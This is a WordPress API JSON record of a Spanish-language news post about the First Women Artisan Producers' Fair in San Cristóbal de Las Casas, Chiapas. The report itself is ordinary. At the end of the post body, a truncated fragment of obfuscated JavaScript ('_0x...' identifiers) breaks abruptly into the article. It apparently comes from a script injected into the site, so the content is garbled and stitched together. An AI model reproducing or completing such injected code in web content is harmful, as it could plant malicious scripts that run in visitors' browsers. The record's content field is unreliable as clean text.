{"id":23828,"date":"2025-09-08T04:40:35","date_gmt":"2025-09-08T04:40:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23828"},"modified":"2025-09-08T04:40:36","modified_gmt":"2025-09-08T04:40:36","slug":"celebran-la-primera-feria-de-la-mujer-artesana-productora","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23828","title":{"rendered":"Celebran la Primera Feria de la Mujer Artesana Productora"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000321248-1024x768.jpg\" alt=\"\" class=\"wp-image-23829\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000321248-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000321248-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000321248-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000321248.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>7 de septiembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 Con el prop\u00f3sito de destacar la aportaci\u00f3n de las mujeres en la vida social, econ\u00f3mica y cultural de Chiapas, se realiz\u00f3 la Primera Feria de la Mujer Artesana Productora en los jardines del Centro Cultural El Carmen.<\/p>\n\n\n\n<p>El encuentro reuni\u00f3 a creadoras de distintas comunidades de la regi\u00f3n Altos, quienes compartieron sus productos y expresiones art\u00edsticas en un ambiente de reconocimiento y valoraci\u00f3n a su labor.<\/p>\n\n\n\n<p>La actividad fue organizada de manera conjunta por la Fiscal\u00eda General del Estado, el Consejo Estatal para la Cultura y las Artes (Coneculta), la Direcci\u00f3n de Cultura y el Consejo de Seguridad del Ayuntamiento de San Crist\u00f3bal. El objetivo central fue dar mayor visibilidad al papel que desempe\u00f1an las mujeres no solo en el arte y la producci\u00f3n artesanal, sino tambi\u00e9n en la econom\u00eda, la pol\u00edtica y la vida comunitaria.<\/p>\n\n\n\n<p>Durante la feria se present\u00f3 adem\u00e1s el Dec\u00e1logo Humanista para la Protecci\u00f3n de Mujeres, Ni\u00f1as, Ni\u00f1os y Adolescentes, documento que busca sensibilizar a la sociedad sobre la necesidad de garantizar derechos y promover la igualdad.<\/p>\n\n\n\n<p>En el evento estuvieron presentes autoridades municipales y estatales, entre ellas el s\u00edndico municipal Jorge Alejandro Ruiz Hern\u00e1ndez, el fiscal general del Estado, Jorge Luis Llaven Abarca, y la presidenta del Voluntariado de la Fiscal\u00eda, Guadalupe G\u00f3mez Casanova, quienes coincidieron en la importancia de respaldar el talento de las artesanas chiapanecas.<\/p>\n\n\n\n<p>Con este esfuerzo interinstitucional se reafirma el compromiso de fortalecer a las mujeres productoras, cuya creatividad y trabajo cotidiano representan una pieza clave en el desarrollo cultural y social de la entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal7 de septiembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 Con el prop\u00f3sito de destacar la aportaci\u00f3n de las mujeres en la vida social, econ\u00f3mica y cultural de Chiapas, se realiz\u00f3 la Primera Feria de la Mujer Artesana Productora en los jardines del Centro Cultural El Carmen. El encuentro reuni\u00f3 a creadoras de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23829,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23828","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23828"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23828\/revisions"}],"predecessor-version":[{"id":23830,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23828\/revisions\/23830"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23829"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}